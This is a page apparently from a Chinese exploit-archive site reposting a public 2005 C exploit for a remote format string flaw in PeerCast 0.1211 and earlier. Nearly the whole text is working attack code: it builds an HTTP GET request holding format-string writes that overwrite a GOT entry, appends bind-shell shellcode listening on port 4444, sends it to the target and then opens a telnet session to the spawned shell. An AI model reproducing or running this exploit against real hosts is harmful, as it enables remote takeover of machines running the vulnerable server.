首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PeerCast <= 0.1211 HTTP Requests Remote Format String Exploit
来源:http://unl0ck.org 作者:Darkeagle 发布时间:2005-06-23  

PeerCast <= 0.1211 HTTP Requests Remote Format String Exploit

/*
\ PeerCast <= 0.1211 remote format string exploit
/ [<< Public Release >>]
\
/ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
\
/ uKt researcherz [ http://unl0ck.org ]
\
/ greetz goes to: uKt researcherz.
\
/
\ - smallest code - better code!!!
/
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>


//*******************************************
#define doit( b0, b1, b2, b3, addr ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
}
//*******************************************

//****************************************************************
char shellcode[] = // binds 4444 port
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";
//****************************************************************


//****************************
#define HOST "127.0.0.1"
#define PORT 7144
#define GOTADDR 0x0809da9c
#define SHELLADDR 0x49adb23c
//****************************

//***********************************************************************
char *
evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
char * buf;
unsigned char b0, b1, b2, b3;
int start = 256;

doit( b0, b1, b2, b3, retaddr );
buf = (char *)malloc(999);
memset( buf, 0, 999 );

b3 -= figure;
b2 -= figure;
b1 -= figure;
b0 -= figure;

snprintf( buf, 999,
"%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
b3 - 16 + start - base, offset,
b2 - b3 + start, offset + 1,
b1 - b2 + start, offset + 2,
b0 - b1 + start, offset + 3 );

return buf;
}
//*************************************************************************


//*************************************************************************
int
main( int argc, char * argv[] )
{
struct sockaddr_in addr;
int sock;
char * fmt;
char endian[31337], da_shell[31337];
unsigned long locaddr, retaddr;
unsigned int offset, base;
unsigned char b0, b1, b2, b3;

system("clear");
printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\n");
printf("*^*^*^ by Darkeagle ^*^*^*\n");
printf("*^*^*^ uKt researcherz [ http://unl0ck.org ] ^*^*^*\n\n");

memset( endian, 0x00, 31337 );
memset( da_shell, 0x00, 31337 );

addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr(HOST);

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

locaddr = GOTADDR;
retaddr = SHELLADDR;
offset = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141

doit( b0, b1, b2, b3, locaddr );

base = 4;
printf("[*] Buildin' evil code\n");
strcat(endian, "GET /html/en/index.html");
snprintf( endian+strlen(endian), sizeof(endian),
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c",
b3, b2, b1, b0,
b3 + 1, b2, b1, b0,
b3 + 2, b2, b1, b0,
b3 + 3, b2, b1, b0 );

fmt = evil_builder( retaddr, offset, base, 0x10 );

memset(fmt+strlen(fmt), 0x55, 32);
strcat(fmt, shellcode);
strcat(endian, fmt);
strcat(endian, "\r\n\r\n\r\n");
printf("[+] Buildin' complete!\n");
sprintf(da_shell, "telnet %s 4444", HOST);

// just go, y0!
printf("[*] Connectin'\n");
if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) { printf("[-] Connection failed!\n\n");
exit(0); }

printf("[+] Connected!\n");
printf("[*] Sleepin'\n");
sleep(1);

printf("[*] Sendin'\n");
send(sock, endian, strlen(endian), 0);

printf("[*] Sleepin'\n");
sleep(1);

printf("[*] Connectin' in da shell\n\n");
sleep(1);
system(da_shell);
return 0;
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·eXtropia WebStore Remote Comma
·phpBB Multiple User Registerat
·Ultimate PHP Board Password Ha
·Simple Machine Forum SQL Injec
·Claroline E-Learning Applicati
·Microsoft Server Message Block
·WordPress <= 1.5.1.1 cat_id
·Microsoft Outlook Express NNTP
·Mambo user_rating Parameter Re
·Veritas Backup Exec Agent CONN
·Forum Russian Board SQL Inject
·TCP-IP Datalook DoS Vulnerabil
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved